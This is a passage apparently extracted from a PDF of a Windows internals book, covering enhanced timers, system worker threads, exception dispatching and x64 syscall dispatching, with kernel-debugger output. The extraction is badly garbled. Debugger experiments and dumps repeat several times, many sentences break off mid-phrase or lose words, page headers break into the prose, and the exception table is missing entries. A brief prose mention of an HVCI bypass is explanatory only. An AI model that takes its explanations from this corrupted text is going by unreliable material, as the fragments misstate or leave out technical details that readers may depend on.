ffffa483ff9cfe48 182745de01 [11/30/2020 20:50:18.691] (Interrupt) [None] NW P (11e1a300)
ffffa483f3cfe740 18276567a9 [11/30/2020 20:50:18.897] (Interrupt)
Wdf01000!FxTimer::_FxTimerExtCallbackThunk (Context @ ffffa483f3db7360) NWF
(1827fdfe29 [11/30/2020 20:50:19.897]) P (02faf080)
CHAPTER 8 System mechanisms
81
ffffa48404c02938 18276c5890 [11/30/2020 20:50:18.943] (Interrupt) [None] NW P (27ef6380)
ffffa483fde8e300 1827a0f6b5 [11/30/2020 20:50:19.288] (Interrupt) [None] NWF (183091c835
[11/30/2020 20:50:34.288])
ffffa483fde88580 1827d4fcb5 [11/30/2020 20:50:19.628] (Interrupt) [None] NWF (18290629b5
[11/30/2020 20:50:21.628])
In this example, you can mostly see No-wake (NW) enhanced timers, with their minimum due
time shown. Some are periodic (P) and will keep being reinserted at expiration time. A few also
System worker threads
During system initialization, Windows creates several threads in the System process, called system
worker threads, which exist solely to perform work on behalf of other threads. In many cases, threads
executing at DPC/dispatch level need to execute functions that can be performed only at a lower IRQL.
can usurp any thread in the system) at DPC/dispatch level IRQL, might need to access paged pool or
wait for a dispatcher object used to synchronize execution with an application thread. Because a DPC
DPC/dispatch level.
Some device drivers and executive components create their own threads dedicated to processing
work at passive level; however, most use system worker threads instead, which avoids the unneces-
sary scheduling and memory overhead associated with having additional threads in the system. An
ExQueueWorkItem or IoQueueWorkItem. Device drivers should use only the latter (because this as-
sociates the work item with a Device object, allowing for greater accountability and the handling of
scenarios in which a driver unloads while its work item is active). These functions place a work item on
a queue dispatcher object where the threads look for work. (Queue dispatcher objects are described in
more detail in the section “I/O completion ports” in Chapter 6 in Part 1.)
The IoQueueWorkItemEx, IoSizeofWorkItem, IoInitializeWorkItem, and IoUninitializeWorkItem APIs
Work items include a pointer to a routine and a parameter that the thread passes to the routine
when it processes the work item. The device driver or executive component that requires passive-level
can initialize a work item that points to the routine in the driver that waits for the dispatcher object. At
ffffa48404c02938 18276c5890 [11/30/2020 20:50:18.943] (Interrupt) [None] NW P (27ef6380)
ffffa483fde8e300 1827a0f6b5 [11/30/2020 20:50:19.288] (Interrupt) [None] NWF (183091c835
[11/30/2020 20:50:34.288])
ffffa483fde88580 1827d4fcb5 [11/30/2020 20:50:19.628] (Interrupt) [None] NWF (18290629b5
[11/30/2020 20:50:21.628])
In this example, you can mostly see No-wake (NW) enhanced timers, with their minimum due
time shown. Some are periodic (P) and will keep being reinserted at expiration time. A few also
82
CHAPTER 8 System mechanisms
worker thread processes its work item.
There are many types of system worker threads:
I
Normal worker threads execute at priority 8 but otherwise behave like delayed worker threads.
I
Background worker threads execute at priority 7 and inherit the same behaviors as normal
worker threads.
I
Delayed worker threads
time-critical.
I
Critical worker threads execute at priority 13 and are meant to process time-critical work items.
I
Super-critical worker threads execute at priority 14, otherwise mirroring their critical counterparts.
I
Hyper-critical worker threads execute at priority 15 and are otherwise just like other critical threads.
I
Real-time worker threads execute at priority 18, which gives them the distinction of operating in
the real-time scheduling range (see Chapter 4 of Part 1 for more information), meaning they are
not subject to priority boosting nor regular time slicing.
Because the naming of all of these worker queues started becoming confusing, recent versions of
Windows introduced custom priority worker threads, which are now recommended for all driver devel-
opers and allow the driver to pass in their own priority level.
A special kernel function, ExpLegacyWorkerInitialization, which is called early in the boot process,
optional registry parameters. You may even have seen these details in an earlier edition of this book.
Note, however, that these variables are there only for compatibility with external instrumentation tools
and are not actually utilized by any part of the kernel on modern Windows 10 systems and later. This is
because recent kernels implemented a new kernel dispatcher object, the priority queue (KPRIQUEUE),
coupled it with a fully dynamic number of kernel worker threads, and further split what used to be a
single queue of worker threads into per-NUMA node worker threads.
On Windows 10 and later, the kernel dynamically creates additional worker threads as needed,
with a default maximum limit of 4096 (see ExpMaximumKernelWorkerThreads-
ured through the registry up to a maximum of 16,384 threads and down to a minimum of 32. You
can set this using the MaximumKernelWorkerThreads
Each partition object, which we described in Chapter 5 of Part 1, contains an executive partition,
which is the portion of the partition object relevant to the executive—namely, the system worker
thread logic. It contains a data structure tracking the work queue manager for each NUMA node part
of the partition (a queue manager is made up of the deadlock detection timer, the work queue item
reaper, and a handle to the actual thread doing the management). It then contains an array of pointers
to each of the eight possible work queues (EX_WORK_QUEUE). These queues are associated with an
individual index and track the number of minimum (guaranteed) and maximum threads, as well as how
many work items have been processed so far.
CHAPTER 8 System mechanisms
83
Every system includes two default work queues: the ExPool queue and the IoPool queue. The former
is used by drivers and system components using the ExQueueWorkItem API, whereas the latter is meant
for IoAllocateWorkItem
meant to be used by the internal (non-exported) ExQueueWorkItemToPrivatePool API, which takes in
a pool identifier
Store Manager (see Chapter 5 of Part 1 for more information) leverages this capability.
The executive tries to match the number of critical worker threads with changing work-
loads as the system executes. Whenever work items are being processed or queued, a check is
made to see if a new worker thread might be needed. If so, an event is signaled, waking up the
ExpWorkQueueManagerThread for the associated NUMA node and partition. An additional worker
thread is created in one of the following conditions:
I
There are fewer threads than the minimum number of threads for this queue.
I
pending work items in the queue, or the last attempt to try to queue a work item failed.
Additionally, once every second, for each worker queue manager (that is, for each NUMA node on
each partition) the ExpWorkQueueManagerThread can also try to determine whether a deadlock may
matching increase in the number of work items processed. If this is occurring, an additional worker
thread will be created, regardless of any maximum thread limits, hoping to clear out the potential
deadlock. This detection will then be disabled until it is deemed necessary to check again (such as if
the maximum number of threads has been reached). Since processor topologies can change due to hot
add
keep track of the new processors as well.
worker thread timeout minutes (by default 10, so once every 20
minutes), this thread also checks if it should destroy any system worker threads. Through the same
WorkerThreadTimeoutInSeconds. This is called reaping and ensures that system worker thread counts
do not get out of control. A system worker thread is reaped if it has been waiting for a long time
(meaning the current number of threads are clearing them all out in a timely fashion).
EXPERIMENT: Listing system worker threads
-
ity (which is no longer per-NUMA node as before, and certainly no longer global), the kernel
!exqueue command can no longer be used to see a listing of system worker threads
Since the EPARTITION, EX_PARTITION, and EX_WORK_QUEUE data structures are all available
in the public symbols, the debugger data model can be used to explore the queues and their
EXPERIMENT: Listing system worker threads
-
ity (which is no longer per-NUMA node as before, and certainly no longer global), the kernel
!exqueue command can no longer be used to see a listing of system worker threads
Since the EPARTITION, EX_PARTITION, and EX_WORK_QUEUE data structures are all available
EX_WORK_QUEUE data structures are all available
EX_WORK_QUEUE
in the public symbols, the debugger data model can be used to explore the queues and their
84
CHAPTER 8 System mechanisms
for the main (default) system partition:
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
: 0xffffa483edea99d0 [Type: _EX_WORK_QUEUE_MANAGER *]
[+0x000] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x008] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x010] Event
[Type: _KEVENT]
[+0x028] DeadlockTimer [Type: _KTIMER]
[+0x068] ReaperEvent
[Type: _KEVENT]
[+0x080] ReaperTimer
[Type: _KTIMER2]
[+0x108] ThreadHandle : 0xffffffff80000008 [Type: void *]
[+0x110] ExitThread
: 0x0 [Type: unsigned long]
[+0x114] ThreadSeed
: 0x1 [Type: unsigned short]
Alternatively, here is the ExPool for NUMA Node 0, which currently has 15 threads and has
processed almost 4 million work items so far!
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 3942949 [Type: unsigned long]
[+0x2c4] WorkItemsProcessedLastPass : 3931167 [Type: unsigned long]
[+0x2c8] ThreadCount
: 15 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: ExPoolUntrusted (0) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
You could then look into the ThreadListWorkPriQueue to enumerate the worker
threads associated with this queue:
lkd> dx -r0 @$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->
ExPartition)->WorkQueues[0][0]
@$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0]
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
lkd> dx Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
[0x0]
[Type: _KTHREAD]
[0x1]
[Type: _KTHREAD]
[0x2]
[Type: _KTHREAD]
[0x3]
[Type: _KTHREAD]
[0x4]
[Type: _KTHREAD]
[0x5]
[Type: _KTHREAD]
[0x6]
[Type: _KTHREAD]
for the main (default) system partition:
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueueManagers[0]
: 0xffffa483edea99d0 [Type: _EX_WORK_QUEUE_MANAGER *]
[+0x000] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x008] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x010] Event
[Type: _KEVENT]
[+0x028] DeadlockTimer [Type: _KTIMER]
[+0x068] ReaperEvent
[Type: _KEVENT]
[+0x080] ReaperTimer
[Type: _KTIMER2]
[+0x108] ThreadHandle : 0xffffffff80000008 [Type: void *]
[+0x110] ExitThread
: 0x0 [Type: unsigned long]
[+0x114] ThreadSeed
: 0x1 [Type: unsigned short]
Alternatively, here is the ExPool for NUMA Node 0, which currently has 15 threads and has
processed almost 4 million work items so far!
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0],d
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 3942949 [Type: unsigned long]
[+0x2c4] WorkItemsProcessedLastPass : 3931167 [Type: unsigned long]
[+0x2c8] ThreadCount
: 15 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: ExPoolUntrusted (0) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
You could then look into the ThreadList
ThreadList
ThreadList
WorkPriQueue to enumerate the worker
threads associated with this queue:
lkd> dx -r0 @$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->
ExPartition)->WorkQueues[0][0]
@$queue = ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][0]
: 0xffffa483ede4dc70 [Type: _EX_WORK_QUEUE *]
lkd> dx Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
Debugger.Utility.Collections.FromListEntry(@$queue->WorkPriQueue.ThreadListHead,
"nt!_KTHREAD", "QueueListEntry")
[0x0]
[Type: _KTHREAD]
[0x1]
[Type: _KTHREAD]
[0x2]
[Type: _KTHREAD]
[0x3]
[Type: _KTHREAD]
[0x4]
[Type: _KTHREAD]
[0x5]
[Type: _KTHREAD]
[0x6]
[Type: _KTHREAD]
CHAPTER 8 System mechanisms
85
[0x7]
[Type: _KTHREAD]
[0x8]
[Type: _KTHREAD]
[0x9]
[Type: _KTHREAD]
[0xa]
[Type: _KTHREAD]
[0xb]
[Type: _KTHREAD]
[0xc]
[Type: _KTHREAD]
[0xd]
[Type: _KTHREAD]
[0xe]
[Type: _KTHREAD]
[0xf]
[Type: _KTHREAD]
That was only the ExPool. Recall that the system also has an IoPool, which would be the next
index (1) on this NUMA Node (0). You can also continue the experiment by looking at private
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
: 0xffffa483ede77c50 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 1844267 [Type: unsigned long]
[+0x2c4] WorkItemsProcessedLastPass : 1843485 [Type: unsigned long]
[+0x2c8] ThreadCount
: 5 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: IoPoolUntrusted (1) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
Exception dispatching
In contrast to interrupts, which can occur at any time, exceptions are conditions that result directly from
the execution of the program that is running. Windows uses a facility known as structured exception
handling, which allows applications to gain control when exceptions occur. The application can then
execution of the subroutine that raised the exception), or declare back to the system that the exception
-
book Windows via C/C++
exception handling is made accessible through language extensions (for example, the __try construct
-
respond to the entry in the IDT that points to the trap handler for a particular exception. Table 8-12 shows
used for exceptions, hardware interrupts are assigned entries later in the table, as mentioned earlier.
[0x7]
[Type: _KTHREAD]
[0x8]
[Type: _KTHREAD]
[0x9]
[Type: _KTHREAD]
[0xa]
[Type: _KTHREAD]
[0xb]
[Type: _KTHREAD]
[0xc]
[Type: _KTHREAD]
[0xd]
[Type: _KTHREAD]
[0xe]
[Type: _KTHREAD]
[0xf]
[Type: _KTHREAD]
That was only the ExPool. Recall that the system also has an IoPool, which would be the next
index (1) on this NUMA Node (0). You can also continue the experiment by looking at private
lkd> dx ((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
((nt!_EX_PARTITION*)(*(nt!_EPARTITION**)&nt!PspSystemPartition)->ExPartition)->
WorkQueues[0][1],d
: 0xffffa483ede77c50 [Type: _EX_WORK_QUEUE *]
[+0x000] WorkPriQueue [Type: _KPRIQUEUE]
[+0x2b0] Partition
: 0xffffa483ede51090 [Type: _EX_PARTITION *]
[+0x2b8] Node
: 0xfffff80467f24440 [Type: _ENODE *]
[+0x2c0] WorkItemsProcessed : 1844267 [Type: unsigned long]
[+0x2c4] WorkItemsProcessedLastPass : 1843485 [Type: unsigned long]
[+0x2c8] ThreadCount
: 5 [Type: long]
[+0x2cc (30: 0)] MinThreads
: 0 [Type: long]
[+0x2cc (31:31)] TryFailed
: 0 [Type: unsigned long]
[+0x2d0] MaxThreads
: 4096 [Type: long]
[+0x2d4] QueueIndex
: IoPoolUntrusted (1) [Type: _EXQUEUEINDEX]
[+0x2d8] AllThreadsExitedEvent : 0x0 [Type: _KEVENT *]
86
CHAPTER 8 System mechanisms
All exceptions, except those simple enough to be resolved by the trap handler, are serviced by a
kernel module called the exception dispatcher
handler that can dispose of the exception. Examples of architecture-independent exceptions that the
-
TABLE 8-12 x86 exceptions and their interrupt numbers
Interrupt Number
Exception
Mnemonic
0
Divide Error
1
Debug (Single Step)
2
Non-Maskable Interrupt (NMI)
-
3
Breakpoint
4
5
Bounds Check (Range Exceeded)
6
Invalid Opcode
7
NPX Not Available
8
9
NPX Segment Overrun
-
10
Invalid Task State Segment (TSS)
11
Segment Not Present
12
13
General Protection
14
15
Intel Reserved
-
16
17
Alignment Check
18
Machine Check
19
20
Virtualization Exception
21
Control Protection (CET)
encountering a breakpoint while executing a program being debugged generates an exception, which
the kernel handles by calling the debugger. The kernel handles certain other exceptions by returning
an unsuccessful status code to the caller.
CHAPTER 8 System mechanisms
87
frame-based exception handlers to deal with these ex-
ceptions. The term frame-based
activation. When a procedure is invoked, a stack frame representing that activation of the procedure
is pushed onto the stack. A stack frame can have one or more exception handlers associated with it,
each of which protects a particular block of code in the source program. When an exception occurs,
the kernel searches for an exception handler associated with the current stack frame. If none exists, the
kernel searches for an exception handler associated with the previous stack frame, and so on, until it
exception handlers.
frame-based technology has been proven to be attackable by malicious users). Instead, a table of
handlers for each function is built into the image during compilation. The kernel looks for handlers as-
sociated with each function and generally follows the same algorithm we described for 32-bit code.
Structured exception handling is heavily used within the kernel itself so that it can safely verify
whether pointers from user mode can be safely accessed for read or write access. Drivers can make
use of this same technique when dealing with pointers sent during I/O control codes (IOCTLs).
Another mechanism of exception handling is called vectored exception handling. This method can be
Microsoft Docs at https://docs.microsoft.com/en-us/windows/win32/debug/vectored-exception-handling.
When an exception occurs, whether it is explicitly raised by software or implicitly raised by hard-
ware, a chain of events begins in the kernel. The CPU hardware transfers control to the kernel trap
handler, which creates a trap frame (as it does when an interrupt occurs). The trap frame allows the
system to resume where it left off if the exception is resolved. The trap handler also creates an excep-
tion record that contains the reason for the exception and other pertinent information.
If the exception occurred in kernel mode, the exception dispatcher simply calls a routine to locate a
frame-based exception handler that will handle the exception. Because unhandled kernel-mode excep-
exception handler. Some traps, however, do not lead into an exception handler because the kernel al-
ways assumes such errors to be fatal; these are errors that could have been caused only by severe bugs
in the internal kernel code or by major inconsistencies in driver code (that could have occurred only
fatal errors will result in a bug check with the UNEXPECTED_KERNEL_MODE_TRAP code.
If the exception occurred in user mode, the exception dispatcher does something more elabo-
rate. The Windows subsystem has a debugger port (this is actually a debugger object, which will be
processes. (In this case, by “port” we mean an ALPC port object, which will be discussed later in this
dispatcher takes is to see whether the process that incurred the exception has an associated debugger
88
CHAPTER 8 System mechanisms
process. If it does, the exception dispatcher sends a debugger object message to the debug object associ-
ated with the process (which internally the system refers to as a “port” for compatibility with programs
that might rely on behavior in Windows 2000, which used an LPC port instead of a debug object).
Trap
handler
Debugger
(first chance)
Frame-based
handlers
Debugger
(second chance)
Environment
subsystem
Windows Error
Reporting
Debugger
port
Debugger
port
Exception
port
Error
port
Kernel default
handler
Exception
record
Function call
ALPC
Exception
dispatcher
FIGURE 8-24 Dispatching an exception.
the exception dispatcher switches into user mode, copies the trap frame to the user stack formatted
as a CONTEXT-
tured or vectored exception handler. If none is found or if none handles the exception, the exception
dispatcher switches back into kernel mode and calls the debugger again to allow the user to do more
debugging. (This is called the second-chance notification.)
was registered by the environment subsystem that controls this thread. The exception port gives the
environment subsystem, which presumably is listening at the port, the opportunity to translate the
-
sage to a systemwide error port that Csrss (Client/Server Run-Time Subsystem) uses for Windows Error
Reporting (WER)—which is discussed in Chapter 10—and executes a default exception handler that
simply terminates the process whose thread caused the exception.
CHAPTER 8 System mechanisms
89
Unhandled exceptions
All Windows threads have an exception handler that processes unhandled exceptions. This exception
handler is declared in the internal Windows start-of-thread function. The start-of-thread function runs
when a user creates a process or any additional threads. It calls the environment-supplied thread start
CreateThread call.
The generic code for the internal start-of-thread functions is shown here:
VOID RtlUserThreadStart(VOID)
{
LPVOID StartAddress = RCX; // Located in the initial thread context structure
LPVOID Argument = RDX; // Located in the initial thread context structure
LPVOID Win32StartAddr;
if (Kernel32ThreadInitThunkFunction != NULL) {
Win32StartAddr = Kernel32ThreadInitThunkFunction;
} else {
Win32StartAddr = StartAddress;
}
__try
{
DWORD ThreadExitCode = Win32StartAddr(Argument);
RtlExitUserThread(ThreadExitCode);
}
__except(RtlpGetExceptionFilter(GetExceptionInformation()))
{
NtTerminateProcess(NtCurrentProcess(), GetExceptionCode());
}
}
EXPERIMENT: Viewing the real user start address for Windows threads
The fact that each Windows thread begins execution in a system-supplied function (and not
the user-supplied function) explains why the start address for thread 0 is the same for every
Windows process in the system (and why the start addresses for secondary threads are also the
same). To see the user-supplied function address, use Process Explorer or the kernel debugger.
Because most threads in Windows processes start at one of the system-supplied wrapper
functions, Process Explorer, when displaying the start address of threads in a process, skips the
initial call frame that represents the wrapper function and instead shows the second frame on the
EXPERIMENT: Viewing the real user start address for Windows threads
The fact that each Windows thread begins execution in a system-supplied function (and not
the user-supplied function) explains why the start address for thread 0 is the same for every
Windows process in the system (and why the start addresses for secondary threads are also the
same). To see the user-supplied function address, use Process Explorer or the kernel debugger.
Because most threads in Windows processes start at one of the system-supplied wrapper
functions, Process Explorer, when displaying the start address of threads in a process, skips the
initial call frame that represents the wrapper function and instead shows the second frame on the
90
CHAPTER 8 System mechanisms
Process Explorer does display the complete call hierarchy when it displays the call stack.
Notice the following results when the Stack button is clicked:
Process Explorer does display the complete call hierarchy when it displays the call stack.
Notice the following results when the Stack button is clicked:
Stack button is clicked:
Stack
CHAPTER 8 System mechanisms
91
this case, kernel32, because you are dealing with a Windows subsystem application. The third
frame (line 18) is the main entry point into Notepad.exe.
Configure Symbols menu item located in the Options menu.
System service handling
calls. In the preceding sections, you saw how interrupt and exception handling work; in this section,
result of executing an instruction assigned to system service dispatching. The instruction that Windows
uses for system service dispatching depends on the processor on which it is executing and whether
User mode
Kernel mode
System
service call
System service 2
0
1
2
3
n
•••
System
service
dispatcher
System service
dispatch table
FIGURE 8-25 System service dispatching.
this case, kernel32, because you are dealing with a Windows subsystem application. The third
frame (line 18) is the main entry point into Notepad.exe.
Configure Symbols menu item located in the Options menu.
92
CHAPTER 8 System mechanisms
Architectural system service dispatching
On most x64 systems, Windows uses the syscall instruction, which results in the change of some of the
key processor state we have learned about in this chapter, based on certain preprogrammed model
specific registers (MSRs):
I
0xC0000081, known as STAR (SYSCALL Target Address Register)
I
0xC0000082, known as LSTAR (Long-Mode STAR)
I
Upon encountering the syscall instruction, the processor acts in the following manner:
I
The Code Segment (CS) is loaded from Bits 32 to 47 in STAR, which Windows sets to 0x0010
I
The Stack Segment (SS) is loaded from Bits 32 to 47 in STAR plus 8, which gives us 0x0018
I
The Instruction Pointer (RIP) is saved in RCX, and the new value is loaded from LSTAR, which
Windows sets to KiSystemCall64
or KiSystemCall64Shadow otherwise. (More information on the Meltdown vulnerability was
provided in the “Hardware side-channel vulnerabilities” section earlier in this chapter.)
I
I
user-space values.
Therefore, although the instruction executes in very few processor cycles, it does leave the processor in an
insecure and unstable state—the user-mode stack pointer is still loaded, GS is still pointing to the TEB, but
the Ring Level, or CPL, is now 0, enabling kernel mode privileges. Windows acts quickly to place the pro-
happen on legacy processors, these are the precise steps that KiSystemCall64 must perform:
By using the swapgs instruction, GS now points to the PCR, as described earlier in this chapter.
The current stack pointer (RSP) is saved into the UserRsp
been loaded, this can be done without using any stack or register.
The new stack pointer is loaded from the RspBase
part of the PCR).
Now that the kernel stack is loaded, the function builds a trap frame, using the format described earlier
in the chapter. This includes storing in the frame the SegSs set to KGDT_R3_DATA (0x2B), Rsp from the
UserRsp in the PCR, EFlags from R11, SegCs set to KGDT_R3_CODE (0x33), and storing Rip from RCX.
how syscall operates.
CHAPTER 8 System mechanisms
93
a syscall) be placed in RCX—yet the syscall instruction overrides RCX with the instruction pointer of the
caller, as shown earlier. Windows is aware of this behavior and copies RCX into R10 before issuing the
syscall
The next steps have to do with processor mitigations such as Supervisor Mode Access Prevention
(SMAP)—such as issuing the stac instruction—and the myriad processor side-channel mitigations, such
as clearing the branch tracing buffers (BTB) or return store buffer (RSB). Additionally, on processors
-
chronized correctly. Beyond this point, additional elements of the trap frame are stored, such as various
nonvolatile registers and debug registers, and the nonarchitectural handling of the system call begins,
which we discuss in more detail in just a bit.
different instruction is used, which is called sysenter
spend too much time digging into this instruction other than mentioning that its behavior is similar—a
certain amount of processor state is loaded from various MSRs, and the kernel does some additional
work, such as setting up the trap frame. More details can be found in the relevant Intel processor
manuals. Similarly, ARM-based processors use the svc instruction, which has its own behavior and OS-
level handling, but these systems still represent only a small minority of Windows installations.
There is one more corner case that Windows must handle: processors without Mode Base Execution
Controls (MBEC) operating while Hypervisor Code Integrity (HVCI) is enabled suffer from a design issue
that violates the promises HVCI provides. (Chapter 9 covers HVCI and MBEC.) Namely, an attacker could
allocate user-space executable memory, which HVCI allows (by marking the respective SLAT entry as
the virtual address appear as a kernel page. Because the MMU would see the page as being kernel,
Supervisor Mode Execution Prevention (SMEP) would not prohibit execution of the code, and because
The attacker has now achieved arbitrary kernel-mode code execution, violating the basic tenet of HVCI.
versus user executable bits in the SLAT entry data structures, allowing the hypervisor (or the Secure
kernel non executable but user execut-
able. Unfortunately, on processors without this capability, the hypervisor has no choice but to trap all
code privilege level changes and swap between two different sets of SLAT entries—ones marking all
user physical pages as nonexecutable, and ones marking them as executable. The hypervisor traps CPL
changes by making the IDT appear empty (effectively setting its limit to 0) and decoding the underly-
ing instruction, which is an expensive operation. However, as interrupts can directly be trapped by the
hypervisor, avoiding these costs, the system call dispatch code in user space prefers issuing an interrupt
if it detects an HVCI-enabled system without MBEC-like capabilities. The SystemCall bit in the Shared
User Data structure described in Chapter 4, Part 1, is what determines this situation.
Therefore, when SystemCall is set to 1, x64 Windows uses the int 0x2e instruction, which results in a
trap, including a fully built-out trap frame that does not require OS involvement. Interestingly, this
happens to be the same instruction that was used on ancient x86 processors prior to the Pentium Pro,
94
CHAPTER 8 System mechanisms
and continues to still be supported on x86 systems for backward compatibility with three-decade-old
software that had unfortunately hardcoded this behavior. On x64, however, int 0x2e can be used only
Regardless of which instruction is ultimately used, the user-mode system call dispatching code always
stores a system call index in a register—EAX on x86 and x64, R12 on 32-bit ARM, and X8 on ARM64—
make things easy, the standard function call processor ABI (application binary interface) is maintained
across the boundary—for example, arguments are placed on the stack on x86, and RCX (technically R10
due to the behavior of syscall
calls that occurred through int 0x2e, the iret instruction restores the processor state based on the
syscall and sysenter, though, the processor once again leverages
the MSRs and hardcoded registers we saw on entry, through specialized instructions called sysret and
sysexit
I
The Stack Segment (SS) is loaded from bits 48 to 63 in STAR, which Windows sets to 0x0023
(KGDT_R3_DATA).
I
The Code Segment (CS) is loaded from bits 48 to 63 in STAR plus 0x10, which gives us 0x0033
(KGDT64_R3_CODE).
I
The Instruction Pointer (RIP) is loaded from RCX.
I
I
kernel-space values.
Therefore, just like for system call entry, the exit mechanics must also clean up some processor state.
Namely, RSP is restored to the Rsp
the entry code we analyzed, similar to all the other saved registers. RCX register is loaded from the
saved Rip, R11 is loaded from EFlags, and the swapgs instruction is used right before issuing the sysret
from the trap frame before the sysret instruction. Equivalent actions are taken on for sysexit and
eret). Additionally, if CET is enabled, just like in the entry path, the shadow
stack must correctly be synchronized on the exit path.
EXPERIMENT: Locating the system service dispatcher
As mentioned, x64 system calls occur based on a series of MSRs, which you can use the rdmsr
KGDT_R0_CODE (0x0010)
and KGDT64_R3_DATA (0x0023).
lkd> rdmsr c0000081
msr[c0000081] = 00230010`00000000
EXPERIMENT: Locating the system service dispatcher
As mentioned, x64 system calls occur based on a series of MSRs, which you can use the rdmsr
KGDT_R0_CODE (0x0010)
KGDT_R0_CODE (0x0010)
KGDT_R0_CODE
and KGDT64_R3_DATA (0x0023).
lkd> rdmsr c0000081
msr[c0000081] = 00230010`00000000
CHAPTER 8 System mechanisms
95
Next, you can investigate LSTAR, and then use the ln
KiSystemCall64KiSystemCall64Shadow (for
those that do):
lkd> rdmsr c0000082
msr[c0000082] = fffff804`7ebd3740
lkd> ln fffff804`7ebd3740
(fffff804`7ebd3740) nt!KiSystemCall64
lkd> rdmsr c0000084
msr[c0000084] = 00000000`00004700
x86 system calls occur through sysenter, which uses a different set of MSRs, including 0x176,
which stores the 32-bit system call handler:
lkd> rdmsr 176
msr[176] = 00000000'8208c9c0
lkd> ln 00000000'8208c9c0
(8208c9c0) nt!KiFastCallEntry
the int 0x2e handler registered in the IDT with the !idt 2e debugger command:
lkd> !idt 2e
Dumping IDT: fffff8047af03000
2e:
fffff8047ebd3040 nt!KiSystemService
You can disassemble the KiSystemService or KiSystemCall64 routine with the u
nt!KiSystemService+0x227:
fffff804`7ebd3267 4883c408 add rsp,8
fffff804`7ebd326b 0faee8 lfence
fffff804`7ebd326e 65c604255308000000 mov byte ptr gs:[853h],0
fffff804`7ebd3277 e904070000 jmp nt!KiSystemServiceUser (fffff804`7ebd3980)
while the MSR handler will fall in
nt!KiSystemCall64+0x227:
fffff804`7ebd3970 4883c408 add rsp,8
fffff804`7ebd3974 0faee8 lfence
fffff804`7ebd3977 65c604255308000000 mov byte ptr gs:[853h],0
nt!KiSystemServiceUser:
fffff804`7ebd3980 c645ab02 mov byte ptr [rbp-55h],2
This shows you that eventually both code paths arrive in KiSystemServiceUser, which then does
most common actions across all processors, as discussed in the next section.
Next, you can investigate LSTAR, and then use the ln
KiSystemCall64
KiSystemCall64
KiSystemCall64
KiSystemCall64Shadow (for
